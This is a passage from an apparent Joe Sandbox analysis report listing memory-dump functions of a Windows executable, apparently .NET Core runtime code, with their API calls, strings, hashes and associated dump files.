Opcode Fuzzy Hash: 3ab90b77bedddf687d154dbd727a4ce9161d92a96e05db8a7bae08aad69ea626
Instruction Fuzzy Hash: 9412E470901284EFDB25EF25CD89B9EB7B4AF48300F144198E4496B2D1DB78BE85CF96

Function 00A30050 Relevance: 13.9, APIs: 11, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00A2F2DC,00000000), ref: 00A3006C
HeapAlloc.KERNEL32(03400000,00000000,00000008,00000000,?,00000000,?,00A2F2DC,00000000), ref: 00A30084
GetProcessHeap.KERNEL32(?,00A2F2DC,00000000), ref: 00A300C8
HeapAlloc.KERNEL32(03400000,00000000,00000004,?,00A2F2DC,00000000), ref: 00A300E0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00A2F2DC,00000000), ref: 00A30133
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A2F2DC,00000000), ref: 00A30147
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00A2F2DC,00000000), ref: 00A30168
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00A2F2DC,00000000), ref: 00A3021F

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

Part of subcall function 00986CB0: CreateFileW.KERNELBASE(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,BBFE6088,00000000,00000000,00000000), ref: 00986E2C
Part of subcall function 00986CB0: GetLastError.KERNEL32(?,00000000,00000000,00000000,BBFE6088,00000000,00000000,00000000), ref: 00986E3A
Part of subcall function 00986CB0: SetLastError.KERNEL32(00000000), ref: 00986F70

GetLastError.KERNEL32(00000001,?,00000002,00000080,?,?,?,00A2F2DC,00000000), ref: 00A301CD
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000002,00000080,?,?,?,00A2F2DC,00000000), ref: 00A301F8
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000001,?,00000002,00000080,?,?,?,00A2F2DC,00000000), ref: 00A30207

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$ErrorLastProcessfree$AllocByteCharMultiWide$AllocateCreateFilemalloc
String ID:
API String ID: 1103214431-0
Opcode ID: 40002bb6db5990155ca430f09e0338b002fe24be8209e0b7005bb9022626705a
Instruction ID: 73b849b956de3ccb1e9996012abd5ae37059a5800a728d34cc75e8f9362b0647
Opcode Fuzzy Hash: 40002bb6db5990155ca430f09e0338b002fe24be8209e0b7005bb9022626705a
Instruction Fuzzy Hash: CE51C171B00301EBE7219FA9EC59F6ABBA4EF45710F144269F905DB391EBB1E9008B91

Function 007121B0 Relevance: 13.9, APIs: 11, Instructions: 164COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00DB369C,BBFE6088,03426818,00000000,00DB3670,00000000,00C11AA4,000000FF,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007121E2
InitializeCriticalSection.KERNEL32(00DB36B8,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712205
InitializeCriticalSection.KERNEL32(00DB36D4,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712226
InitializeCriticalSection.KERNEL32(00DB3674,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712256
InitializeCriticalSection.KERNEL32(00DB376C,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712297
InitializeCriticalSection.KERNEL32(00DB3744,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007122D8
InitializeCriticalSection.KERNEL32(00DB3794,?,00713141,00DB3670,00DB3DF0,00000000), ref: 00712319
InitializeCriticalSection.KERNEL32(00DB37BC,?,00713141,00DB3670,00DB3DF0,00000000), ref: 0071235A
InitializeCriticalSection.KERNEL32(00DB36F0,?,00713141,00DB3670,00DB3DF0,00000000), ref: 0071238C
InitializeCriticalSection.KERNEL32(00DB370C,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007123B0
InitializeCriticalSection.KERNEL32(00DB3728,?,00713141,00DB3670,00DB3DF0,00000000), ref: 007123D4

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalInitializeSection$Heap$AllocateProcess
String ID:
API String ID: 4157389036-0
Opcode ID: 4441835fcfbc3f85ff316ab68e78567b7cdb8ca3202026c27dc59c89bcf48ed6
Instruction ID: 465d93125558a076a4d579e012f84ae5fdf0656e3803009264c8489f66fec838
Opcode Fuzzy Hash: 4441835fcfbc3f85ff316ab68e78567b7cdb8ca3202026c27dc59c89bcf48ed6
Instruction Fuzzy Hash: 81811672810B419FE331CF21C855786BBF4BF69304F210B1DE48696A22D7B8B6D98BC4

Function 0096FB80 Relevance: 13.9, APIs: 9, Instructions: 354COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,00000000,?,BBFE6088,-00000001), ref: 0096FC8E
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,BBFE6088,-00000001,BBFE6088,?), ref: 0096FD4B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,BBFE6088,-00000001,BBFE6088,?), ref: 0096FD88
LeaveCriticalSection.KERNEL32(?,00000000,BBFE6088,-00000001,BBFE6088,?), ref: 0096FE16
FreeLibrary.KERNEL32(00000000,00000000,BBFE6088,-00000001,BBFE6088,?), ref: 0096FE63
LeaveCriticalSection.KERNEL32(?,00000000,BBFE6088,-00000001,BBFE6088,?), ref: 0096FE7E
LeaveCriticalSection.KERNEL32(?,00000000,?,BBFE6088,-00000001,BBFE6088,?), ref: 0096FEE1
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00000000,00000000,?,BBFE6088,-00000001), ref: 0096FFE1
FreeLibrary.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,BBFE6088,-00000001), ref: 0097002F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection$FreeLibrarywcsncpy_s
String ID:
API String ID: 728819610-0
Opcode ID: 900cbf206da8adbc20f1f03702116089cc2dc52535bf752ae4bbdbcc7c7b8b95
Instruction ID: 98ae08bd311dda8ea639ac8a371ec803d419f3b30872e07c084a672661af8d72
Opcode Fuzzy Hash: 900cbf206da8adbc20f1f03702116089cc2dc52535bf752ae4bbdbcc7c7b8b95
Instruction Fuzzy Hash: 14E1AE71A0030ADFEB25CF64D8687AEBBB8FF15354F108169EC15A7292D7759D40CB90

Function 0088D430 Relevance: 13.8, APIs: 5, Strings: 4, Instructions: 274memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?), ref: 0088D896

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

HeapFree.KERNEL32(00000000,?), ref: 0088D5FF
HeapFree.KERNEL32(00000000,?), ref: 0088D626

Part of subcall function 0097D080: LCMapStringEx.KERNEL32(00D00A50,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 0097D115
Part of subcall function 0097D080: LCMapStringEx.KERNEL32(00D00A50,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000), ref: 0097D167

Strings

4, xrefs: 0088D7F4
ProfAPI_ProfilerCompatibilitySetting, xrefs: 0088D574, 0088D780
EnableV2Profiler, xrefs: 0088D50A
PreventLoad, xrefs: 0088D523

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$String
String ID: 4$EnableV2Profiler$PreventLoad$ProfAPI_ProfilerCompatibilitySetting
API String ID: 953258383-3714678557
Opcode ID: ec7fff35965139092e0d00bb099513ea35f8dd7454b6bc684f989a23800c27ed
Instruction ID: 0c2654d4b0c04541bf8c9eb0ca98df792bc0fcdefcce61768a68a40f634ce0eb
Opcode Fuzzy Hash: ec7fff35965139092e0d00bb099513ea35f8dd7454b6bc684f989a23800c27ed
Instruction Fuzzy Hash: 7EC139B0A00358DBEB20DF55DC99B9ABBB4FB44308F5041E8E608A7292D7755F84CF59

Function 009FFD80 Relevance: 13.7, APIs: 9, Instructions: 214memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 009FFDD9
HeapAlloc.KERNEL32(03400000,00000000,00000FF8,00000000,00000000,00000000), ref: 009FFDF4
GetProcessHeap.KERNEL32 ref: 009FFE48
HeapAlloc.KERNEL32(03400000,00000000,0000000C), ref: 009FFE60

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: cb3c81b0c05f937f3477e1ec0b66d88e0586244d73cdcc83b494ff58f4433d45
Instruction ID: df757b5dc41e2f588bb6e43c2ece75a48abe811121da562c5f0f58cb9a0135fe
Opcode Fuzzy Hash: cb3c81b0c05f937f3477e1ec0b66d88e0586244d73cdcc83b494ff58f4433d45
Instruction Fuzzy Hash: 6471AF72704345DBE720DF29E854B2ABBE4AB94720F10422DFA49CB3D1DBB5D84487A5

Function 008320A0 Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcServer,00000000,00000000,00710000), ref: 008320C3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcConcurrent), ref: 008320F7

Strings

gcConcurrent, xrefs: 008320F1
gcServer, xrefs: 008320BD, 008320C2, 008320F6, 0083212C, 0083216B
System.GC.Server, xrefs: 008321EC
GCRetainVM, xrefs: 00832127

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strcmp
String ID: GCRetainVM$System.GC.Server$gcConcurrent$gcServer
API String ID: 1004003707-3257568746
Opcode ID: 357aba7b185f21b48fecfe9073efe34a8b10cc1bbeaf336e0ad72ac3cb01dbf9
Instruction ID: a5ba0e6a198e85cf21644921529bcea41ec70d9b14b3ddd723199954987d82f1
Opcode Fuzzy Hash: 357aba7b185f21b48fecfe9073efe34a8b10cc1bbeaf336e0ad72ac3cb01dbf9
Instruction Fuzzy Hash: 7641E9327002089FD710DF65EC45BEEB7B4EFA5311F4001BAEA05D6282DB715E59DBA1

Function 00A34660 Relevance: 13.6, APIs: 9, Instructions: 142fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000004,00000000,00000000,00A355E7,?,?), ref: 00A34697
GetLastError.KERNEL32 ref: 00A346A9
GetOverlappedResult.KERNEL32(?,00000000,00000000,00000001), ref: 00A346C0
WriteFile.KERNEL32(?,?,00000004,00000000,00000000), ref: 00A34723
GetLastError.KERNEL32 ref: 00A34732
GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 00A3474E
WriteFile.KERNEL32(FFFCB810,?,?,00000000,?), ref: 00A3477A
GetLastError.KERNEL32 ref: 00A34789
GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 00A347A5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorFileLastOverlappedResultWrite
String ID:
API String ID: 2326230619-0
Opcode ID: 588d67c8c418f6b2d387f2177a2c8c48251c01c0adc06b9c59690d2ac461873b
Instruction ID: 2de53f685830006b7d93628d300009707a1e3c5871cca03ce428b19b9322ff06
Opcode Fuzzy Hash: 588d67c8c418f6b2d387f2177a2c8c48251c01c0adc06b9c59690d2ac461873b
Instruction Fuzzy Hash: F0513971A00249AFDB11CFA5C885BEEBBF8EF19300F048055E904E7261D371AE95DB91

Function 009A9960 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 263COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(00000003,?,00000000,?,00000000), ref: 009A9A3D
SetEvent.KERNEL32(00000200,?,00000000,?,00000000), ref: 009A9A76

Part of subcall function 00990700: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,0099C843,?,?,?,03446270), ref: 0099071C
Part of subcall function 00990700: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,0099C843,?,?,?,03446270), ref: 0099073C

Part of subcall function 009903F0: LeaveCriticalSection.KERNEL32(00000024,00000000,009A9C78), ref: 00990400
Part of subcall function 009903F0: SleepEx.KERNEL32(000000FF,00000000), ref: 00990446

Strings

DRCT::ML:: Exiting., xrefs: 009A9C57
DRCT::THTML:: Doing helper thread duty, running main loop., xrefs: 009A9D20
DRCT::ML:: threads still syncing after sweep., xrefs: 009A9BF8
DRCT::ML:: wait set empty after sweep., xrefs: 009A9BCF
DRCT::THTML:: Exiting., xrefs: 009A9E3A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Sleep$CriticalEventLeaveMultipleObjectsSectionWait
String ID: DRCT::ML:: Exiting.$DRCT::ML:: threads still syncing after sweep.$DRCT::ML:: wait set empty after sweep.$DRCT::THTML:: Doing helper thread duty, running main loop.$DRCT::THTML:: Exiting.
API String ID: 568098540-3202962050
Opcode ID: 3962045295b9510105c69cb56e956fe92c8c8028ba87118570c50cf31e503f15
Instruction ID: bc3846581a5c69efd8dac3f8c01fd5aca43fd3ca70e80068eff6b3752efb323a
Opcode Fuzzy Hash: 3962045295b9510105c69cb56e956fe92c8c8028ba87118570c50cf31e503f15
Instruction Fuzzy Hash: FBA18C70E00244ABEF14DFA8D989BAEBBB5FF46310F144159E815AB3C2DB759D44CBA0

Function 0084DBE0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 226threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(74FDD070,?,?,?,BBFE6088), ref: 008B4B7E
SleepEx.KERNEL32(00000001,00000000), ref: 008B4D75
SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C3FA95,000000FF,?,008B6677,03426878), ref: 008B4D7B
SetLastError.KERNEL32(00000000,?,?,BBFE6088), ref: 008B4DB3

Strings

RareEnablePreemptiveGC: leaving., xrefs: 008B500A
RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 008B4C18
RareEnablePreemptiveGC: entering. Thread state = %x, xrefs: 008B4F86

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$SleepSwitchThread
String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: leaving.
API String ID: 490134931-775955930
Opcode ID: 1568a934b0978607b94a7b0daf3db937e5a631a6241982667c036a407bef6cbc
Instruction ID: 28d67f80c93ca567b1b88050ab118d3c6aff8efaa4194ac63f109334cbe44b3b
Opcode Fuzzy Hash: 1568a934b0978607b94a7b0daf3db937e5a631a6241982667c036a407bef6cbc
Instruction Fuzzy Hash: 3C81D231600701CFDB25DF18D89ABAA7BA5FB42B04F085059E945DB3A3DBB5EC81CB61

Function 00828960 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 224memoryCOMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,00000000,?), ref: 00828A21

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

Part of subcall function 00828740: HeapFree.KERNEL32(00000000,?), ref: 00828874

HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 00828AC5
HeapFree.KERNEL32(00000000,?,?,00D00F78,?, ,00000000,?), ref: 00828B42
HeapFree.KERNEL32(00000000,?,00000000,008286C0,?,00000109,00000000,?,00D00F78,?, ,00000000,?), ref: 00828BD1
HeapFree.KERNEL32(00000000,00000000,00000000,008286C0,?,00000109,00000000,?,00D00F78), ref: 00828C09

Strings

at, xrefs: 00828A16
, xrefs: 00828AF7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$wcscpy_s
String ID: $ at
API String ID: 1983039323-3158221822
Opcode ID: e71043bec3f5f0341ede45cd049e6078b387876535ab2d84678b782e31b762bd
Instruction ID: 71cf61bfb2fdaeeb7f5617d7301a704cb30f11dae8de796e46cda45530850abf
Opcode Fuzzy Hash: e71043bec3f5f0341ede45cd049e6078b387876535ab2d84678b782e31b762bd
Instruction Fuzzy Hash: 5D916870E01258EBEF24CFA4E986BEDBBB4FF44314F144229E811A72D1DB746A85CB51

Function 00A27AE0 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 214libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A27BF9

Part of subcall function 00A28740: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,Microsoft-DotNETCore-SampleProfiler,00000000,?,?,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A28762

GetProcAddress.KERNEL32(00000000,timeBeginPeriod), ref: 00A27CE9
GetProcAddress.KERNEL32(timeEndPeriod), ref: 00A27CFF

Strings

timeBeginPeriod, xrefs: 00A27CE3
timeEndPeriod, xrefs: 00A27CEF
Microsoft-DotNETCore-SampleProfiler, xrefs: 00A27B83
winmm.dll, xrefs: 00A27CD0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
